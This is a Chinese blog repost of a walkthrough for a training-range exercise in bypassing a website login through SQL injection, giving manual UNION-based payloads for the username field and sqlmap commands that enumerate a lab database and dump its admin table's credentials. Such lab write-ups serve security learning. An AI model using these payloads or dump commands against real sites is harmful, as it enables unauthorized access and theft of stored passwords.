我是靠谱客的博主 怕黑早晨,最近开发中收集的这篇文章主要介绍SQL注入网站后台登录绕过(墨者靶场),觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

靶场地址:SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

一、手工注入

通过网站URL地址判断不存在id=x等可传参数,此网站不采用GET方式传参。

brup抓包

由此可判断为POST传参

 加入单引号判断,网页报错,存在注入点

注入语句

username=admin' and 1=2 union select 1,2,3,4 --+

//爆库
username=admin' and 1=2 union select 1,2,3,database() --+
//数据库 purchase

Mysql5.0以上高版本自带数据库information_schema

注入语句爆表名:

username=admin' and 1=2 union select 1,2,3,table_name from information_schema.tables where table_schema = 'purchase'--+&password=admin

 爆列名:

username=admin' and 1=2 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name = 'admin'--+&password=admin

最后再查密码:

 二、SQLMAP工具注入

SQLMAP测试语句:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin"

--data 表示采用POST传参,后面跟上可传参数

成功,存在注入点

查询当前数据库:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --current-db

purchase 数据库下的所有表名:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --tables -D "purchase"

--tables -D "数据库名"     -D —> Databse

admin表下所有列名:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --column -T "admin" -D "purchase"

--column -T "admin" -D "数据库名"     -T —> Table

 查询所有列名数据:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --dump -C "id,password,thekey,username" -T "admin" -D "purchase"

最后

以上就是怕黑早晨为你收集整理的SQL注入网站后台登录绕过(墨者靶场)的全部内容,希望文章能够帮你解决SQL注入网站后台登录绕过(墨者靶场)所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(34)

评论列表共有 0 条评论

立即
投稿
返回
顶部